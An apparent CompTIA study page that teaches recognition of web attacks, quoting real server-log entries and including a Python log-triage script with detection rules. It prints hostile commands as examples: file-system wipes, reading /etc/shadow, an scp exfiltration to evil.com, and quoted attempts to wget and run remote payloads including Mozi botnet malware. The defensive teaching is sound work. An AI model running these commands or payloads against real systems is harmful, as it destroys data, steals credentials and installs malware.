
Recognizing Attacks

Name, Symptom, and Result

CompTIA wants you to recognize common attack categories. For each one you need to know a simplified description of its symptoms, and what it could lead to.

Cross-site Scripting / XSS

Symptom:
A page at "a popular social media site" contains:
<script ...></script>

Possible result:
It tricks your browser into sending an authentication cookie to a hostile server instead of the appropriate one.

SQL Injection

Symptom:
Log of transactions includes: ' or 1=1; --
or: "Strange punctuation marks"

Possible result:
Literally anything that could be done on a database server. Deleting database tables, deleting records, changing records, adding records, and so on.

Command Injection

Symptom:
The web server log contains requests that include command syntax.
Windows:
format c: /y
type \path\to\sensitive\file
Linux:
rm -rf /
cat /etc/shadow
scp /path/to-sensitive/file hacker@evil.com:
In both operating systems, spaces may be replaced with %20.

Possible result:
Literally anything. The examples above would delete the entire file system or exfiltrate the contents of a sensitive file.

Real world example, way too complicated to appear on the exam. Here is something from the logs for this site. The hostile client was 185.239.242.171, which resolves to scl-00172.mails--servers.org (as per nslookup or dig), and is in an IP address block belonging to Serverion BV in the Netherlands (as per whois).

The log entry was:
185.239.242.171 - - [17/Feb/2021:20:14:13 +0000] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`cd /tmp; wget 37.46.150.102/lolol.sh; chmod 777 lolol.sh; sh lolol.sh` HTTP/1.1" 400 150 "-" - -

The client at 185.239.242.171 is trying to trick my server into downloading and running a program stored on a server at 37.46.150.102, which resolves to situku.e-conteri.com and is in a different address block belonging to Serverion BV.

Or there's this far too common attempt to install the Mozi software on an IoT device running a poorly configured web server. It asks to change to /tmp, remove everything there, and then download and run a program named Mozi.a with a parameter jaws, doing all the dirty work. Spaces are represented by "+":
94.43.10.33 - - [04/Jan/2021:22:56:00 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://94.43.10.33:53251/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 169 "-" - -

Running a command like the following on a web server is eye-opening:
grep wget /var/www/logs/httpd-access.log

Session Hijacking / Insecure Direct Object References

Symptom:
User Fred notices that when logged in to his bank the URL includes user=fred, so he changes it to his friend user=mary and reloads the page, and sees her data.

Possible result:
Now he's in a session as Mary, so he can do anything that she could do with her account.

Directory Traversal

Symptom:
Server log includes ../../ in requested URLs.

Possible result:
If the server allows itself to be tricked into climbing out of the web area, the attacker can read and possibly execute files outside the web area.

Or, maybe they could execute a command! Remember that %20 encodes ASCII space:
GET ../../../Windows/System32/whatever.exe%20parameter1%20parameter2
GET ../../../Windows/System32/format.com%20c:%20/y
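As an added example (not the page author's code), here is a small Python triage script that generalizes the grep for wget above: it URL-decodes each request, treating both %20 and + as a space, and tags it with the command-injection, SQL-injection and directory-traversal symptoms this page lists. The first two sample log lines are the entries quoted above; the remaining lines and the regex signatures are constructed for illustration and use documentation address ranges.

```python
import re
from urllib.parse import unquote_plus

# Sample access-log lines: the first two are the entries quoted on this page,
# the next two are constructed for this example, and the last one is benign.
SAMPLE_LOG = """\
185.239.242.171 - - [17/Feb/2021:20:14:13 +0000] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`cd /tmp; wget 37.46.150.102/lolol.sh; chmod 777 lolol.sh; sh lolol.sh` HTTP/1.1" 400 150 "-" - -
94.43.10.33 - - [04/Jan/2021:22:56:00 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://94.43.10.33:53251/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 169 "-" - -
203.0.113.7 - - [05/Jan/2021:01:02:03 +0000] "GET /login?user=admin%27%20or%201%3D1%3B%20-- HTTP/1.1" 200 512 "-" - -
198.51.100.9 - - [05/Jan/2021:01:05:00 +0000] "GET /static/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 210 "-" - -
192.0.2.44 - - [05/Jan/2021:01:06:00 +0000] "GET /index.html HTTP/1.1" 200 3120 "-" - -
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD path HTTP/x", status.
# The path is matched lazily because injected shell text may itself contain spaces.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?)(?: HTTP/\S+)?" (\d{3})')

# Each rule is (category, regex) applied to the URL-decoded request. Simplified signatures.
RULES = [
    ("sql_injection", re.compile(r"'\s*or\s+1\s*=\s*1|;\s*--", re.I)),
    ("command_injection", re.compile(r"`|;\s*(cd|rm|wget|curl|chmod|sh|cat|scp|format|type)\b", re.I)),
    ("directory_traversal", re.compile(r"\.\./|\.\.\\")),
]

def decode_request(path):
    """Undo URL encoding as the page describes: %20 and '+' both mean space.
    Decoding twice also exposes double-encoded payloads such as %252e%252e."""
    return unquote_plus(unquote_plus(path))

def classify(line):
    """Return (client_ip, decoded_path, [categories]), or None if the line doesn't parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, raw_path, _status = m.groups()
    decoded = decode_request(raw_path)
    return ip, decoded, [name for name, rx in RULES if rx.search(decoded)]

def triage(log_text):
    """Return only the suspicious requests, as (client_ip, [categories]) pairs."""
    flagged = []
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[2]:
            flagged.append((parsed[0], parsed[2]))
    return flagged

if __name__ == "__main__":
    for ip, cats in triage(SAMPLE_LOG):
        print(f"{ip:16} {', '.join(cats)}")
```

Point triage() at the contents of a real access log to see which clients are probing for which class of flaw; the benign index.html request produces no line of output.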

Cross-Site Request Forgery / XSRF / CSRF

Symptom:
Malicious content within a popular page contains a malformed <img src="..."> object.

Possible result:
A third party is disadvantaged, to the advantage of the person who dropped that comment into an unfiltered comment area.

Fixes for All of These

The common problem is that user input is not properly sanitized or validated for size, syntax, or meaning.

Adding or fixing input data validation means modifying software, so always apply patches.

WAFs or Web Application Firewalls know about these, so use one to protect the web front ends to public-facing services.
